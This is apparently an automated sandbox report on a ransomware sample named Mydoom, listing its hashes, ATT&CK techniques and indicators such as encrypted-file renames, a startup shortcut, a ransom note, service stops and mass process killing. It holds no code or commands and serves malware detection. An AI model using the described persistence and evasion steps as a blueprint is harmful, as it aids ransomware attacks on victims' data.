195688fdc5454fb7f6ba8188015e395bfe86876a9c0e28b818944ee264f0e77c

Resubmissions

21/08/2024, 19:30

240821-x76q3sweqg 10

21/08/2024, 17:42

240821-v92h2avgpj 10

12/06/2024, 16:01

240612-tgps4a1bqh 10

Analysis

max time kernel
1439s
max time network
1440s
platform
windows7_x64
resource
win7-20240729-en
resource tags

arch:x64arch:x86image:win7-20240729-enlocale:en-usos:windows7-x64system
submitted
21/08/2024, 17:42

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Mydoom Ransomwares/1a174a556ce8e7a22c66f515ae1591f775bb673e989d5a39334f901edccf5406.exe
Size

127KB
MD5

93a7ed73f2245a1f043b74e724705f54
SHA1

6b97b4cd5d44e607540b841081f68b7755ce59f5
SHA256

1a174a556ce8e7a22c66f515ae1591f775bb673e989d5a39334f901edccf5406
SHA512

ab1d5999d7bdeb0a2d93a7476cbcace92971417d45a7459fbe294ed66d0466f0e121a68fe9ade89c3c71d4afab3b81b94aaaeabc99e6f02f79c307acbf574090
SSDEEP

3072:bhADm5OPINYUsx0Ki6uA9bKHtBdQex7Coy5q5l:bhAcO7xhjuA9bQQzq

Score

10^/10

discovery evasion execution ransomware

Malware Config

Signatures

Disables service(s) 3 TTPs
evasion execution

Windows Service
T1543.003

Service Stop
T1489

Service Execution
T1569.002
Renames multiple (224) files with added filename extension
This suggests ransomware activity of encrypting all the files on the system.
ransomware

Blocklisted process makes network request 4 IoCs

flow	pid	Process
4	1408	mshta.exe
5	1408	mshta.exe
7	1408	mshta.exe
8	1408	mshta.exe

Deletes itself 1 IoCs

pid	Process
2120	cmd.exe

Drops startup file 1 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\mystartup.lnk	1a174a556ce8e7a22c66f515ae1591f775bb673e989d5a39334f901edccf5406.exe

Drops desktop.ini file(s) 6 IoCs

description	ioc	Process
File opened for modification	C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\Accessories\Tablet PC\Desktop.ini	1a174a556ce8e7a22c66f515ae1591f775bb673e989d5a39334f901edccf5406.exe
File opened for modification	C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools\Desktop.ini	1a174a556ce8e7a22c66f515ae1591f775bb673e989d5a39334f901edccf5406.exe
File opened for modification	C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\Accessories\Accessibility\Desktop.ini	1a174a556ce8e7a22c66f515ae1591f775bb673e989d5a39334f901edccf5406.exe
File opened for modification	C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\Maintenance\Desktop.ini	1a174a556ce8e7a22c66f515ae1591f775bb673e989d5a39334f901edccf5406.exe
File opened for modification	C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\Games\Desktop.ini	1a174a556ce8e7a22c66f515ae1591f775bb673e989d5a39334f901edccf5406.exe
File opened for modification	C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\Accessories\Desktop.ini	1a174a556ce8e7a22c66f515ae1591f775bb673e989d5a39334f901edccf5406.exe

Drops file in Program Files directory 56 IoCs

description	ioc	Process
File opened for modification	C:\Program Files\ResetBlock.emf	1a174a556ce8e7a22c66f515ae1591f775bb673e989d5a39334f901edccf5406.exe
File opened for modification	C:\Program Files\ResetInitialize.dib.secure[[email protected]]	1a174a556ce8e7a22c66f515ae1591f775bb673e989d5a39334f901edccf5406.exe
File opened for modification	C:\Program Files\ResetInitialize.dib	1a174a556ce8e7a22c66f515ae1591f775bb673e989d5a39334f901edccf5406.exe
File opened for modification	C:\Program Files\ConvertToMove.wm.secure[[email protected]]	1a174a556ce8e7a22c66f515ae1591f775bb673e989d5a39334f901edccf5406.exe
File opened for modification	C:\Program Files\RepairRequest.xlsm	1a174a556ce8e7a22c66f515ae1591f775bb673e989d5a39334f901edccf5406.exe
File opened for modification	C:\Program Files\StopMerge.ini.secure[[email protected]]	1a174a556ce8e7a22c66f515ae1591f775bb673e989d5a39334f901edccf5406.exe
File opened for modification	C:\Program Files\CloseCompare.clr.secure[[email protected]]	1a174a556ce8e7a22c66f515ae1591f775bb673e989d5a39334f901edccf5406.exe
File opened for modification	C:\Program Files\MeasureGroup.cab.secure[[email protected]]	1a174a556ce8e7a22c66f515ae1591f775bb673e989d5a39334f901edccf5406.exe
File opened for modification	C:\Program Files\UnpublishExit.potm	1a174a556ce8e7a22c66f515ae1591f775bb673e989d5a39334f901edccf5406.exe
File opened for modification	C:\Program Files\EditSkip.mp4v.secure[[email protected]]	1a174a556ce8e7a22c66f515ae1591f775bb673e989d5a39334f901edccf5406.exe
File opened for modification	C:\Program Files\GroupCheckpoint.7z.secure[[email protected]]	1a174a556ce8e7a22c66f515ae1591f775bb673e989d5a39334f901edccf5406.exe
File opened for modification	C:\Program Files\TraceReset.midi.secure[[email protected]]	1a174a556ce8e7a22c66f515ae1591f775bb673e989d5a39334f901edccf5406.exe
File opened for modification	C:\Program Files\UpdateUninstall.asx	1a174a556ce8e7a22c66f515ae1591f775bb673e989d5a39334f901edccf5406.exe
File opened for modification	C:\Program Files\AddConvert.mov	1a174a556ce8e7a22c66f515ae1591f775bb673e989d5a39334f901edccf5406.exe
File opened for modification	C:\Program Files\CloseResume.wdp	1a174a556ce8e7a22c66f515ae1591f775bb673e989d5a39334f901edccf5406.exe
File opened for modification	C:\Program Files\SuspendMerge.wmx	1a174a556ce8e7a22c66f515ae1591f775bb673e989d5a39334f901edccf5406.exe
File opened for modification	C:\Program Files\SuspendReset.reg	1a174a556ce8e7a22c66f515ae1591f775bb673e989d5a39334f901edccf5406.exe
File opened for modification	C:\Program Files\SuspendReset.reg.secure[[email protected]]	1a174a556ce8e7a22c66f515ae1591f775bb673e989d5a39334f901edccf5406.exe
File opened for modification	C:\Program Files\ConvertFromCheckpoint.ppt	1a174a556ce8e7a22c66f515ae1591f775bb673e989d5a39334f901edccf5406.exe
File opened for modification	C:\Program Files\RepairRequest.xlsm.secure[[email protected]]	1a174a556ce8e7a22c66f515ae1591f775bb673e989d5a39334f901edccf5406.exe
File opened for modification	C:\Program Files\SetApprove.gif	1a174a556ce8e7a22c66f515ae1591f775bb673e989d5a39334f901edccf5406.exe
File opened for modification	C:\Program Files\ExpandImport.mpv2.secure[[email protected]]	1a174a556ce8e7a22c66f515ae1591f775bb673e989d5a39334f901edccf5406.exe
File opened for modification	C:\Program Files\ResolveNew.js.secure[[email protected]]	1a174a556ce8e7a22c66f515ae1591f775bb673e989d5a39334f901edccf5406.exe
File opened for modification	C:\Program Files\StopMerge.ini	1a174a556ce8e7a22c66f515ae1591f775bb673e989d5a39334f901edccf5406.exe
File opened for modification	C:\Program Files\DebugSync.eps.secure[[email protected]]	1a174a556ce8e7a22c66f515ae1591f775bb673e989d5a39334f901edccf5406.exe
File opened for modification	C:\Program Files\ResolveNew.js	1a174a556ce8e7a22c66f515ae1591f775bb673e989d5a39334f901edccf5406.exe
File opened for modification	C:\Program Files\BlockJoin.rm	1a174a556ce8e7a22c66f515ae1591f775bb673e989d5a39334f901edccf5406.exe
File opened for modification	C:\Program Files\BlockOut.m3u.secure[[email protected]]	1a174a556ce8e7a22c66f515ae1591f775bb673e989d5a39334f901edccf5406.exe
File opened for modification	C:\Program Files\CloseResume.wdp.secure[[email protected]]	1a174a556ce8e7a22c66f515ae1591f775bb673e989d5a39334f901edccf5406.exe
File opened for modification	C:\Program Files\EditSkip.mp4v	1a174a556ce8e7a22c66f515ae1591f775bb673e989d5a39334f901edccf5406.exe
File opened for modification	C:\Program Files\ProtectRegister.rmi	1a174a556ce8e7a22c66f515ae1591f775bb673e989d5a39334f901edccf5406.exe
File opened for modification	C:\Program Files\AddConvert.mov.secure[[email protected]]	1a174a556ce8e7a22c66f515ae1591f775bb673e989d5a39334f901edccf5406.exe
File opened for modification	C:\Program Files\AddWatch.bin	1a174a556ce8e7a22c66f515ae1591f775bb673e989d5a39334f901edccf5406.exe
File opened for modification	C:\Program Files\RestartResume.tiff.secure[[email protected]]	1a174a556ce8e7a22c66f515ae1591f775bb673e989d5a39334f901edccf5406.exe
File opened for modification	C:\Program Files\RevokeHide.vst.secure[[email protected]]	1a174a556ce8e7a22c66f515ae1591f775bb673e989d5a39334f901edccf5406.exe
File opened for modification	C:\Program Files\TraceReset.midi	1a174a556ce8e7a22c66f515ae1591f775bb673e989d5a39334f901edccf5406.exe
File opened for modification	C:\Program Files\ConvertFromCheckpoint.ppt.secure[[email protected]]	1a174a556ce8e7a22c66f515ae1591f775bb673e989d5a39334f901edccf5406.exe
File opened for modification	C:\Program Files\GroupCheckpoint.7z	1a174a556ce8e7a22c66f515ae1591f775bb673e989d5a39334f901edccf5406.exe
File opened for modification	C:\Program Files\ProtectRegister.rmi.secure[[email protected]]	1a174a556ce8e7a22c66f515ae1591f775bb673e989d5a39334f901edccf5406.exe
File opened for modification	C:\Program Files\RestartResume.tiff	1a174a556ce8e7a22c66f515ae1591f775bb673e989d5a39334f901edccf5406.exe
File opened for modification	C:\Program Files\BlockOut.m3u	1a174a556ce8e7a22c66f515ae1591f775bb673e989d5a39334f901edccf5406.exe
File opened for modification	C:\Program Files\DebugSync.eps	1a174a556ce8e7a22c66f515ae1591f775bb673e989d5a39334f901edccf5406.exe
File opened for modification	C:\Program Files\MeasureGroup.cab	1a174a556ce8e7a22c66f515ae1591f775bb673e989d5a39334f901edccf5406.exe
File opened for modification	C:\Program Files\UninstallConfirm.mhtml	1a174a556ce8e7a22c66f515ae1591f775bb673e989d5a39334f901edccf5406.exe
File opened for modification	C:\Program Files\CloseCompare.clr	1a174a556ce8e7a22c66f515ae1591f775bb673e989d5a39334f901edccf5406.exe
File opened for modification	C:\Program Files\ExpandImport.mpv2	1a174a556ce8e7a22c66f515ae1591f775bb673e989d5a39334f901edccf5406.exe
File opened for modification	C:\Program Files\SuspendMerge.wmx.secure[[email protected]]	1a174a556ce8e7a22c66f515ae1591f775bb673e989d5a39334f901edccf5406.exe
File opened for modification	C:\Program Files\RevokeHide.vst	1a174a556ce8e7a22c66f515ae1591f775bb673e989d5a39334f901edccf5406.exe
File opened for modification	C:\Program Files\SetApprove.gif.secure[[email protected]]	1a174a556ce8e7a22c66f515ae1591f775bb673e989d5a39334f901edccf5406.exe
File opened for modification	C:\Program Files\BlockJoin.rm.secure[[email protected]]	1a174a556ce8e7a22c66f515ae1591f775bb673e989d5a39334f901edccf5406.exe
File opened for modification	C:\Program Files\UpdateUninstall.asx.secure[[email protected]]	1a174a556ce8e7a22c66f515ae1591f775bb673e989d5a39334f901edccf5406.exe
File opened for modification	C:\Program Files\ResetBlock.emf.secure[[email protected]]	1a174a556ce8e7a22c66f515ae1591f775bb673e989d5a39334f901edccf5406.exe
File opened for modification	C:\Program Files\UninstallConfirm.mhtml.secure[[email protected]]	1a174a556ce8e7a22c66f515ae1591f775bb673e989d5a39334f901edccf5406.exe
File opened for modification	C:\Program Files\UnpublishExit.potm.secure[[email protected]]	1a174a556ce8e7a22c66f515ae1591f775bb673e989d5a39334f901edccf5406.exe
File opened for modification	C:\Program Files\AddWatch.bin.secure[[email protected]]	1a174a556ce8e7a22c66f515ae1591f775bb673e989d5a39334f901edccf5406.exe
File opened for modification	C:\Program Files\ConvertToMove.wm	1a174a556ce8e7a22c66f515ae1591f775bb673e989d5a39334f901edccf5406.exe

Drops file in Windows directory 28 IoCs

description	ioc	Process
File opened for modification	C:\Windows\msdfmap.ini	1a174a556ce8e7a22c66f515ae1591f775bb673e989d5a39334f901edccf5406.exe
File opened for modification	C:\Windows\DtcInstall.log.secure[[email protected]]	1a174a556ce8e7a22c66f515ae1591f775bb673e989d5a39334f901edccf5406.exe
File opened for modification	C:\Windows\PFRO.log	1a174a556ce8e7a22c66f515ae1591f775bb673e989d5a39334f901edccf5406.exe
File opened for modification	C:\Windows\system.ini.secure[[email protected]]	1a174a556ce8e7a22c66f515ae1591f775bb673e989d5a39334f901edccf5406.exe
File opened for modification	C:\Windows\win.ini	1a174a556ce8e7a22c66f515ae1591f775bb673e989d5a39334f901edccf5406.exe
File opened for modification	C:\Windows\WMSysPr9.prx	1a174a556ce8e7a22c66f515ae1591f775bb673e989d5a39334f901edccf5406.exe
File opened for modification	C:\Windows\Ultimate.xml	1a174a556ce8e7a22c66f515ae1591f775bb673e989d5a39334f901edccf5406.exe
File opened for modification	C:\Windows\WindowsUpdate.log.secure[[email protected]]	1a174a556ce8e7a22c66f515ae1591f775bb673e989d5a39334f901edccf5406.exe
File opened for modification	C:\Windows\DtcInstall.log	1a174a556ce8e7a22c66f515ae1591f775bb673e989d5a39334f901edccf5406.exe
File opened for modification	C:\Windows\Starter.xml	1a174a556ce8e7a22c66f515ae1591f775bb673e989d5a39334f901edccf5406.exe
File opened for modification	C:\Windows\system.ini	1a174a556ce8e7a22c66f515ae1591f775bb673e989d5a39334f901edccf5406.exe
File opened for modification	C:\Windows\TSSysprep.log.secure[[email protected]]	1a174a556ce8e7a22c66f515ae1591f775bb673e989d5a39334f901edccf5406.exe
File opened for modification	C:\Windows\WindowsUpdate.log	1a174a556ce8e7a22c66f515ae1591f775bb673e989d5a39334f901edccf5406.exe
File created	C:\Windows\bootstat.dat.secure[[email protected]]	1a174a556ce8e7a22c66f515ae1591f775bb673e989d5a39334f901edccf5406.exe
File opened for modification	C:\Windows\msdfmap.ini.secure[[email protected]]	1a174a556ce8e7a22c66f515ae1591f775bb673e989d5a39334f901edccf5406.exe
File opened for modification	C:\Windows\WindowsShell.Manifest	1a174a556ce8e7a22c66f515ae1591f775bb673e989d5a39334f901edccf5406.exe
File created	C:\Windows\RESTORE_FILES_INFO.txt	1a174a556ce8e7a22c66f515ae1591f775bb673e989d5a39334f901edccf5406.exe
File opened for modification	C:\Windows\bootstat.dat	1a174a556ce8e7a22c66f515ae1591f775bb673e989d5a39334f901edccf5406.exe
File opened for modification	C:\Windows\mib.bin	1a174a556ce8e7a22c66f515ae1591f775bb673e989d5a39334f901edccf5406.exe
File opened for modification	C:\Windows\TSSysprep.log	1a174a556ce8e7a22c66f515ae1591f775bb673e989d5a39334f901edccf5406.exe
File opened for modification	C:\Windows\Ultimate.xml.secure[[email protected]]	1a174a556ce8e7a22c66f515ae1591f775bb673e989d5a39334f901edccf5406.exe
File opened for modification	C:\Windows\win.ini.secure[[email protected]]	1a174a556ce8e7a22c66f515ae1591f775bb673e989d5a39334f901edccf5406.exe
File opened for modification	C:\Windows\setupact.log	1a174a556ce8e7a22c66f515ae1591f775bb673e989d5a39334f901edccf5406.exe
File opened for modification	C:\Windows\setupact.log.secure[[email protected]]	1a174a556ce8e7a22c66f515ae1591f775bb673e989d5a39334f901edccf5406.exe
File opened for modification	C:\Windows\setuperr.log	1a174a556ce8e7a22c66f515ae1591f775bb673e989d5a39334f901edccf5406.exe
File opened for modification	C:\Windows\PFRO.log.secure[[email protected]]	1a174a556ce8e7a22c66f515ae1591f775bb673e989d5a39334f901edccf5406.exe
File opened for modification	C:\Windows\Starter.xml.secure[[email protected]]	1a174a556ce8e7a22c66f515ae1591f775bb673e989d5a39334f901edccf5406.exe
File opened for modification	C:\Windows\WindowsShell.Manifest.secure[[email protected]]	1a174a556ce8e7a22c66f515ae1591f775bb673e989d5a39334f901edccf5406.exe

Launches sc.exe 8 IoCs

Sc.exe is a Windows utlilty to control services on the system.

pid	Process
2796	sc.exe
1956	sc.exe
2988	sc.exe
2732	sc.exe
2756	sc.exe
3000	sc.exe
940	sc.exe
1420	sc.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 64 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskkill.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	sc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskkill.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskkill.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskkill.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskkill.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskkill.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskkill.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	sc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskkill.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskkill.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskkill.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	mshta.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskkill.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskkill.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	1a174a556ce8e7a22c66f515ae1591f775bb673e989d5a39334f901edccf5406.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	sc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskkill.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskkill.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskkill.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	sc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskkill.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskkill.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskkill.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskkill.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskkill.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskkill.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	sc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskkill.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskkill.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	sc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	sc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskkill.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskkill.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskkill.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	sc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskkill.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskkill.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskkill.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskkill.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskkill.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	fsutil.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskkill.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskkill.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskkill.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskkill.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskkill.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskkill.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskkill.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	PING.EXE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskkill.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskkill.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskkill.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskkill.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskkill.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskkill.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	choice.exe

System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs

Adversaries may check for Internet connectivity on compromised systems.

discovery

Internet Connection Discovery

T1016.001

pid	Process
2884	cmd.exe
1436	PING.EXE

Kills process with taskkill 48 IoCs

evasion

pid	Process
1948	taskkill.exe
2316	taskkill.exe
1900	taskkill.exe
2404	taskkill.exe
2020	taskkill.exe
1180	taskkill.exe
3032	taskkill.exe
1156	taskkill.exe
2216	taskkill.exe
2524	taskkill.exe
2508	taskkill.exe
2640	taskkill.exe
1572	taskkill.exe
2612	taskkill.exe
2840	taskkill.exe
2860	taskkill.exe
1472	taskkill.exe
1292	taskkill.exe
1232	taskkill.exe
2836	taskkill.exe
1932	taskkill.exe
2068	taskkill.exe
1140	taskkill.exe
2928	taskkill.exe
2200	taskkill.exe
1112	taskkill.exe
756	taskkill.exe
2628	taskkill.exe
2400	taskkill.exe
660	taskkill.exe
1180	taskkill.exe
1728	taskkill.exe
2660	taskkill.exe
2220	taskkill.exe
2676	taskkill.exe
1708	taskkill.exe
2896	taskkill.exe
812	taskkill.exe
2044	taskkill.exe
1768	taskkill.exe
2052	taskkill.exe
2060	taskkill.exe
884	taskkill.exe
3032	taskkill.exe
2080	taskkill.exe
2868	taskkill.exe
1224	taskkill.exe
848	taskkill.exe

Modifies Internet Explorer settings 1 TTPs 1 IoCs

adware spyware

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-2257386474-3982792636-3902186748-1000\Software\Microsoft\Internet Explorer\Main	mshta.exe

Modifies registry key 1 TTPs 1 IoCs

Modify Registry

T1112

pid	Process
2944	reg.exe

Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery

T1018

pid	Process
1436	PING.EXE

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
1976	1a174a556ce8e7a22c66f515ae1591f775bb673e989d5a39334f901edccf5406.exe
1976	1a174a556ce8e7a22c66f515ae1591f775bb673e989d5a39334f901edccf5406.exe
1976	1a174a556ce8e7a22c66f515ae1591f775bb673e989d5a39334f901edccf5406.exe
1976	1a174a556ce8e7a22c66f515ae1591f775bb673e989d5a39334f901edccf5406.exe
1976	1a174a556ce8e7a22c66f515ae1591f775bb673e989d5a39334f901edccf5406.exe
1976	1a174a556ce8e7a22c66f515ae1591f775bb673e989d5a39334f901edccf5406.exe
1976	1a174a556ce8e7a22c66f515ae1591f775bb673e989d5a39334f901edccf5406.exe
1976	1a174a556ce8e7a22c66f515ae1591f775bb673e989d5a39334f901edccf5406.exe
1976	1a174a556ce8e7a22c66f515ae1591f775bb673e989d5a39334f901edccf5406.exe
1976	1a174a556ce8e7a22c66f515ae1591f775bb673e989d5a39334f901edccf5406.exe
1976	1a174a556ce8e7a22c66f515ae1591f775bb673e989d5a39334f901edccf5406.exe
1976	1a174a556ce8e7a22c66f515ae1591f775bb673e989d5a39334f901edccf5406.exe
1976	1a174a556ce8e7a22c66f515ae1591f775bb673e989d5a39334f901edccf5406.exe
1976	1a174a556ce8e7a22c66f515ae1591f775bb673e989d5a39334f901edccf5406.exe
1976	1a174a556ce8e7a22c66f515ae1591f775bb673e989d5a39334f901edccf5406.exe
1976	1a174a556ce8e7a22c66f515ae1591f775bb673e989d5a39334f901edccf5406.exe
1976	1a174a556ce8e7a22c66f515ae1591f775bb673e989d5a39334f901edccf5406.exe
1976	1a174a556ce8e7a22c66f515ae1591f775bb673e989d5a39334f901edccf5406.exe
1976	1a174a556ce8e7a22c66f515ae1591f775bb673e989d5a39334f901edccf5406.exe
1976	1a174a556ce8e7a22c66f515ae1591f775bb673e989d5a39334f901edccf5406.exe
1976	1a174a556ce8e7a22c66f515ae1591f775bb673e989d5a39334f901edccf5406.exe
1976	1a174a556ce8e7a22c66f515ae1591f775bb673e989d5a39334f901edccf5406.exe
1976	1a174a556ce8e7a22c66f515ae1591f775bb673e989d5a39334f901edccf5406.exe
1976	1a174a556ce8e7a22c66f515ae1591f775bb673e989d5a39334f901edccf5406.exe
1976	1a174a556ce8e7a22c66f515ae1591f775bb673e989d5a39334f901edccf5406.exe
1976	1a174a556ce8e7a22c66f515ae1591f775bb673e989d5a39334f901edccf5406.exe
1976	1a174a556ce8e7a22c66f515ae1591f775bb673e989d5a39334f901edccf5406.exe
1976	1a174a556ce8e7a22c66f515ae1591f775bb673e989d5a39334f901edccf5406.exe
1976	1a174a556ce8e7a22c66f515ae1591f775bb673e989d5a39334f901edccf5406.exe
1976	1a174a556ce8e7a22c66f515ae1591f775bb673e989d5a39334f901edccf5406.exe
1976	1a174a556ce8e7a22c66f515ae1591f775bb673e989d5a39334f901edccf5406.exe
1976	1a174a556ce8e7a22c66f515ae1591f775bb673e989d5a39334f901edccf5406.exe
1976	1a174a556ce8e7a22c66f515ae1591f775bb673e989d5a39334f901edccf5406.exe
1976	1a174a556ce8e7a22c66f515ae1591f775bb673e989d5a39334f901edccf5406.exe
1976	1a174a556ce8e7a22c66f515ae1591f775bb673e989d5a39334f901edccf5406.exe
1976	1a174a556ce8e7a22c66f515ae1591f775bb673e989d5a39334f901edccf5406.exe
1976	1a174a556ce8e7a22c66f515ae1591f775bb673e989d5a39334f901edccf5406.exe
1976	1a174a556ce8e7a22c66f515ae1591f775bb673e989d5a39334f901edccf5406.exe
1976	1a174a556ce8e7a22c66f515ae1591f775bb673e989d5a39334f901edccf5406.exe
1976	1a174a556ce8e7a22c66f515ae1591f775bb673e989d5a39334f901edccf5406.exe
1976	1a174a556ce8e7a22c66f515ae1591f775bb673e989d5a39334f901edccf5406.exe
1976	1a174a556ce8e7a22c66f515ae1591f775bb673e989d5a39334f901edccf5406.exe
1976	1a174a556ce8e7a22c66f515ae1591f775bb673e989d5a39334f901edccf5406.exe
1976	1a174a556ce8e7a22c66f515ae1591f775bb673e989d5a39334f901edccf5406.exe
1976	1a174a556ce8e7a22c66f515ae1591f775bb673e989d5a39334f901edccf5406.exe
1976	1a174a556ce8e7a22c66f515ae1591f775bb673e989d5a39334f901edccf5406.exe
1976	1a174a556ce8e7a22c66f515ae1591f775bb673e989d5a39334f901edccf5406.exe
1976	1a174a556ce8e7a22c66f515ae1591f775bb673e989d5a39334f901edccf5406.exe
1976	1a174a556ce8e7a22c66f515ae1591f775bb673e989d5a39334f901edccf5406.exe
1976	1a174a556ce8e7a22c66f515ae1591f775bb673e989d5a39334f901edccf5406.exe
1976	1a174a556ce8e7a22c66f515ae1591f775bb673e989d5a39334f901edccf5406.exe
1976	1a174a556ce8e7a22c66f515ae1591f775bb673e989d5a39334f901edccf5406.exe
1976	1a174a556ce8e7a22c66f515ae1591f775bb673e989d5a39334f901edccf5406.exe
1976	1a174a556ce8e7a22c66f515ae1591f775bb673e989d5a39334f901edccf5406.exe
1976	1a174a556ce8e7a22c66f515ae1591f775bb673e989d5a39334f901edccf5406.exe
1976	1a174a556ce8e7a22c66f515ae1591f775bb673e989d5a39334f901edccf5406.exe
1976	1a174a556ce8e7a22c66f515ae1591f775bb673e989d5a39334f901edccf5406.exe
1976	1a174a556ce8e7a22c66f515ae1591f775bb673e989d5a39334f901edccf5406.exe
1976	1a174a556ce8e7a22c66f515ae1591f775bb673e989d5a39334f901edccf5406.exe
1976	1a174a556ce8e7a22c66f515ae1591f775bb673e989d5a39334f901edccf5406.exe
1976	1a174a556ce8e7a22c66f515ae1591f775bb673e989d5a39334f901edccf5406.exe
1976	1a174a556ce8e7a22c66f515ae1591f775bb673e989d5a39334f901edccf5406.exe
